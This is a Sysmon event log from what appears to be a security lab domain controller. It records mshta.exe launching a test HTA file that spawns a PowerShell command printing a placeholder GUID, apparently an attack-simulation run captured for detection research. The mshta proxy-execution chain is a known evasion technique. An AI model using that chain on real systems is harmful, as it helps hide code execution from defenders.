15:59:17.226{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5355-6008-3606-00000000A301}7732C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000023272Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.179{7901BC46-5355-6008-3606-00000000A301}7732C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_sj4zfqf5.oal.ps12021-01-20 15:59:17.179 10341000x800000000000000023271Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.179{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5355-6008-3606-00000000A301}7732C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023270Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.132{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5355-6008-3706-00000000A301}5124C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023269Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.132{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5355-6008-3706-00000000A301}5124C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023268Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.116{7901BC46-5355-6008-3706-00000000A301}51246568C:\Windows\system32\conhost.exe{7901BC46-5355-6008-3606-00000000A301}7732C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023267Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.116{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5355-6008-3706-00000000A301}5124C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023266Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.101{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023265Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.101{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023264Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.101{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023263Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.101{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023262Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.101{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5355-6008-3606-00000000A301}7732C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023261Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.101{7901BC46-5355-6008-3506-00000000A301}68126844C:\Windows\SysWOW64\mshta.exe{7901BC46-5355-6008-3606-00000000A301}7732C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\System32\windows.storage.dll+1240e6(wow64)|C:\Windows\System32\windows.storage.dll+123da1(wow64)|C:\Windows\System32\windows.storage.dll+123e73(wow64)|C:\Windows\System32\windows.storage.dll+124b45(wow64)|C:\Windows\System32\windows.storage.dll+1239f1(wow64)|C:\Windows\System32\windows.storage.dll+125d40(wow64)|C:\Windows\System32\windows.storage.dll+125fbc(wow64)|C:\Windows\System32\windows.storage.dll+1258a5(wow64)|C:\Windows\System32\shell32.dll+1a82b4(wow64)|C:\Windows\System32\shell32.dll+1a818e(wow64)|C:\Windows\System32\shell32.dll+13be0a(wow64)|C:\Windows\System32\shcore.dll+2fffa(wow64) 154100x800000000000000023260Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.114{7901BC46-5355-6008-3606-00000000A301}7732C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=65D86C34814C02569E2AD53FD24E7F61,SHA256=8133502266008B77DE7921451E1210B0EF3F0ED2DB7D8D3EE0C3350D856FA6FA,IMPHASH=5E0145CEF36FA9BFBA7DE33AA683B8ED{7901BC46-5355-6008-3506-00000000A301}6812C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} 10341000x800000000000000023259Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.070{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5355-6008-3506-00000000A301}6812C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023258Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.070{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5355-6008-3506-00000000A301}6812C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023257Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.070{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5355-6008-3506-00000000A301}6812C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023256Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.054{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5355-6008-3506-00000000A301}6812C:\Windows\SysWOW64\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023255Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.054{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5355-6008-3506-00000000A301}6812C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023254Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.054{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5355-6008-3506-00000000A301}6812C:\Windows\SysWOW64\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023253Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.054{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5355-6008-3506-00000000A301}6812C:\Windows\SysWOW64\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023252Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.023{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023251Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.023{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023250Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.023{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023249Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.023{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5355-6008-3506-00000000A301}6812C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023248Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.023{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023247Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.023{7901BC46-5354-6008-3406-00000000A301}65966308C:\Windows\explorer.exe{7901BC46-5355-6008-3506-00000000A301}6812C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+8db63|C:\Windows\System32\SHELL32.dll+8da2b|C:\Windows\System32\SHELL32.dll+8d347|C:\Windows\System32\SHELL32.dll+6b47e|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 154100x800000000000000023246Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.032{7901BC46-5355-6008-3506-00000000A301}6812C:\Windows\SysWOW64\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=A65AE0DB1DAA6B07C89DCC1E21D3EB42,SHA256=5B6429B98ADF532E6F694C9A6CD1A1943B4AA3D5EA524D4FB353939FD9C61342,IMPHASH=79925B1930721457F5E11BF877806843{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding 10341000x800000000000000023245Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.023{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023244Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 